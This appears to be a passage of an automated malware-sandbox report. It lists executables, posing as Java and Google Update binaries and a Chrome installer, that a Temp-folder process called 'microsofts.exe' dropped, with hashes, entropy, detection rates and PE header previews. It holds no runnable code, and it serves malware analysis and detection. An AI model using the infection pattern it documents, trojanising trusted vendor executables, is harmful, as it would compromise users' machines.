                                                                                                                                                                                                                                                                                                          SSDEEP:12288:/nEbH0j4x7R6SvyCM8Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:/kwOtO78sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:176B5FB421C3A6285EEC3B0FCBF01A5B
                                                                                                                                                                                                                                                                                                          SHA1:E4BC85DF58F801AC0BF9CA5DC4BB1EA501F07915
                                                                                                                                                                                                                                                                                                          SHA-256:6185FC1306CCC0BB22D5784F58A40AD382591699B04EC6402BF5A4B8D0F003D4
                                                                                                                                                                                                                                                                                                          SHA-512:CFCDB98E9FBAAAB70168914E9E9AEE6337A6406C266D40B46CD5DEAB7BD3D0387AB77F0959AA32C168C99C2F167116B472774233F2166E8681F474BA1296DB23
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@...............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1375232
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.446797871977871
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:fnU/h/4KvsqjnhMgeiCl7G0nehbGZpbD:fU/VTDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:0C909940E537099E3A7095D795714C45
                                                                                                                                                                                                                                                                                                          SHA1:6862B739A1180BE20446E27D5217AA255664AD89
                                                                                                                                                                                                                                                                                                          SHA-256:1D25D0D7A5D10A6A279BDAB96C950C0DE7F2D788BB267295C4B80733D44215C7
                                                                                                                                                                                                                                                                                                          SHA-512:6F8481EE1C52F8B85FCFA0269A9632ED37E4E03AFBCEE9C4957B58C6A7A2148246CF95B14A6C21DEF7F6291AB3474F762D0C09085C47038EDBE045D382477738
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@...............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1513984
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.483734473687962
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:Px71iBLZ05jNTmJWExIsqjnhMgeiCl7G0nehbGZpbD:PxhiHIjNg0Dmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:60FE77B5B6D89647870AA63743294C9A
                                                                                                                                                                                                                                                                                                          SHA1:58F4AC7914152841E913B5454643882C75672B5C
                                                                                                                                                                                                                                                                                                          SHA-256:D239C98755B27FC94716EF05C56E066CE24335223C0A4DFB2E8D8BB6F12216AB
                                                                                                                                                                                                                                                                                                          SHA-512:10FFE411F220CFD62A2EE6BDAD29031D6F8F7BDFE39811A27E1CADFC66D228A7D8CE6F48CEFDD31986754428DFB2C418BEC015ADAA4D1815911DB9F301E6C1BF
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.............................................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1419264
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.466705812692128
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:elnRklQ6fgJcEwix+sqjnhMgeiCl7G0nehbGZpbD:qoRfgJcEwCSDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:E6B2EEBE75D85F618BCB231D70BD1234
                                                                                                                                                                                                                                                                                                          SHA1:E75C71E2B0E479BEC5C75E3469EF4FA29F68AB02
                                                                                                                                                                                                                                                                                                          SHA-256:8D8050FC089DAADD648B6C8FD76D6F8BD0AE4D0A7A5F3C7EC481D669A99FC416
                                                                                                                                                                                                                                                                                                          SHA-512:896901E323DB92A1CA2C9C0153BD6CE16B883455C88D7307CBCB4CA9DBC50A856517E238002FCEBD86619137C49B8D690932692EB7B13C383233F75F4E87B351
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@.........................................................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...p.......`...H..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1522176
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4965063984947395
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:tW25k8hb0Haw+xOsqjnhMgeiCl7G0nehbGZpbD:tWyk8SHawmiDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:6F2B4DE3187122B7FA3B9B1A9805E920
                                                                                                                                                                                                                                                                                                          SHA1:56283CD7C7072EA41228DB6FDF8ABE1AD7184F12
                                                                                                                                                                                                                                                                                                          SHA-256:C5FBC46962A2A7A3D96F4F24408C9AAB283CA03E241B47C6D6A00520D8AFC568
                                                                                                                                                                                                                                                                                                          SHA-512:7AFE32D1A4FE339950DA3855B6EE0DAE1A2599D3DB7C5F5AF29ED667302A986FEA298B12A68A72FDB8D1567E9758D585B1006C27BEEEE176FCAE9AEF3DD37F4E
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@.....................................T.... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1282048
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1639341081179815
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:6WP/aK2vB+NXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:6KCKABWsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:2B2DF1BEF96B6AF00DEDFA06FE9B7574
                                                                                                                                                                                                                                                                                                          SHA1:B65E0E43E902919CC470862CAFF5B3A8CB79581C
                                                                                                                                                                                                                                                                                                          SHA-256:FFD6C3821D4826A9E0D52BE6FBD63BA669D358E58D081AA1BF5300067EE701B8
                                                                                                                                                                                                                                                                                                          SHA-512:A73A27538E6927F44B1EECF87B9685285480908F5BB0DBAAD7E9B73719CA4ABA3FE2D903AEC1F2B5C35E66CF06FB3A99F6B67570328F0AF53C5D1DF23C2E5D2D
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@.................................C.......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1228288
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.162006915287255
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:6O7cCNWB+09fXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:HjNWBP9sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:A55EB9265677D543C93BD0B3CA951F58
                                                                                                                                                                                                                                                                                                          SHA1:866AD5772BAB5A64943CB47F0D2513FE2C71EB23
                                                                                                                                                                                                                                                                                                          SHA-256:BD7F1A0FE061E45742A2AEC8342C4F894984BB5CD997675AFBCC5319F1FDC603
                                                                                                                                                                                                                                                                                                          SHA-512:7CA913758986A05A3DE06ADC224B859D5F40579B46C0BB36DDB4C0E88EEB15B3C358B8C2527D5E4ED3E1FA560C88B96CF41FE90AA6B69DB0B271395DD9AA7FF8
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@.........................................................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1302528
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.238899269533076
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:2ihRyhdsRrTsqjnhMgeiCl7G0nehbGZpbD:2ihsoRXDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:02B43F54AADF2485F7EE672DECAE374A
                                                                                                                                                                                                                                                                                                          SHA1:FB662BBE848B6AF3307617CC26CAA90D2F2376BC
                                                                                                                                                                                                                                                                                                          SHA-256:6CB3BAF4E8253575895F598887142213DEFCC9F679FCA5E912A73D6FE62925AD
                                                                                                                                                                                                                                                                                                          SHA-512:7ED536188E99B2FA4D86C884D3E2A7362C3B8620D97C8DDC2E4D07FF97DBF97F62DB9A7C39911B15337E329AA03DB637A072843786475394C25F465BE9C23D06
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p.......j.... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1342464
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.350994005746682
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:71FDmRF+wpx/Qaf0sqjnhMgeiCl7G0nehbGZpbD:3mRF+wn/JfQDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:55465E53911DA165F357631E027254F4
                                                                                                                                                                                                                                                                                                          SHA1:CFB6B2BE8DF68DEDC095B482325DB3E44B507BDC
                                                                                                                                                                                                                                                                                                          SHA-256:D50EABEBF644FB4930AE7BE1E436D51A4095220CEAE1D7580FB68755327B0376
                                                                                                                                                                                                                                                                                                          SHA-512:AC2B3962AC64D53A529C9F0970C0B7A97DB39CECBD4F9CF8A0381C095CF9D12ECA81515361D078EC57686292D84D29C8B0377A8EE08D1D44D9F9C46D44F4EEFA
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@..................................................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1228288
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.161975491582021
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:I2Ae621B+0YJXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:lE21BPasqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:A648A70AC78743EA84DE0B04FDEA8746
                                                                                                                                                                                                                                                                                                          SHA1:364EE3B013843A22FBF939039467223514C2BA98
                                                                                                                                                                                                                                                                                                          SHA-256:818EEA692F1FEE8367E42A3FC38910FC81069322B3B4F7BA3BB205B28EE79A5F
                                                                                                                                                                                                                                                                                                          SHA-512:1796BE6249E61485C3297C0490FBB891B2D036316BB6C6D43CDC4F5254E53BF0C6792B3C1953917AFA25BB35CE9CBDC5FC255E37929DF3D21F60B71667A3361A
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@..................................L.......................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):105669632
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999989847076896
                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                          SSDEEP:3145728:RLAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:xBWx/pt8U7E6aZRfIICU
                                                                                                                                                                                                                                                                                                          MD5:C50489C6F683418C0CD65DBF286CA434
                                                                                                                                                                                                                                                                                                          SHA1:AF8881E72CCAD29903DB8E1D6B5827B5773337B1
                                                                                                                                                                                                                                                                                                          SHA-256:867B8523925DA7D14819470D236490610FCBDD155C62F284624B956077E31529
                                                                                                                                                                                                                                                                                                          SHA-512:C7DC1B1867EC33B466C71E8F214A23D4B035DAC0E0D527356F8DA1927039B659D454D6D9663A170813CD615C092425CB6B0044418ACC66D9C13032DC3AE21203
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4...LC................@..............................L.......L... ..................................................X..P........+C.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc....+C......,C..X..............@..@.reloc........C.......C.............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1158144
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.068066437874322
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:JWXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:JWsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:2C1208ABF13FEFF7B0A655A2A4D74197
                                                                                                                                                                                                                                                                                                          SHA1:24C574199575B823C942A95CC20F137DA157D328
                                                                                                                                                                                                                                                                                                          SHA-256:9A9180A0EAA5B7B5921582825614219CA5CFACD528F180A84E7C2C5558733108
                                                                                                                                                                                                                                                                                                          SHA-512:EA25D742DEFC32902ED1B649AF7A83F0B366866A6A074CC09ED496C5FCF1892539C9BD395A212AE49D332EE621605FD25423186BD1E0E471802706FEF9BDF48D
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@..................................0......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...P.......@...l..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1142272
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.032396450093068
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:oKtXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:1tsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:457AA0B21CA15AB0AF7EA92A5CDC5694
                                                                                                                                                                                                                                                                                                          SHA1:4F093F6DB37714731CA8B360B4CF7F31294D2796
                                                                                                                                                                                                                                                                                                          SHA-256:20EDDE53A09DEEBE98BFA00E0515228C5AD5205ACB01B99DCE2BEB4849086BBF
                                                                                                                                                                                                                                                                                                          SHA-512:9D05B86807414F691ACEB9AC2F2A99FC1AEBACE87D165272F10A57C71BE95193C9755C0793284D955FA4CB6CEB30BB7E7B5079D603CCFD2176C525BB8583BE13
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1375232
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.446062265811503
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:SnEbH0j4x7R6SvyCM8Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:SkwOtO78sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:0309D4D169AB5810F8A6D7BBBEBA7CAF
                                                                                                                                                                                                                                                                                                          SHA1:A4B48790031A39D2DC2AEA3EC926F99060FB3302
                                                                                                                                                                                                                                                                                                          SHA-256:849AF6EB7816A5C3581BBB4E0DBA0272556A1B9DC1F871918611CA89EFD1CF47
                                                                                                                                                                                                                                                                                                          SHA-512:F0B5E3A40F555500668B4615C7A4DDC2C0A93B87A35FF1BFAEC9FF09BCF64CABBB837C6CD2B31695CB770709E1FCDD6139EB0A635599BD50D023FCD2202D2284
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@...............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

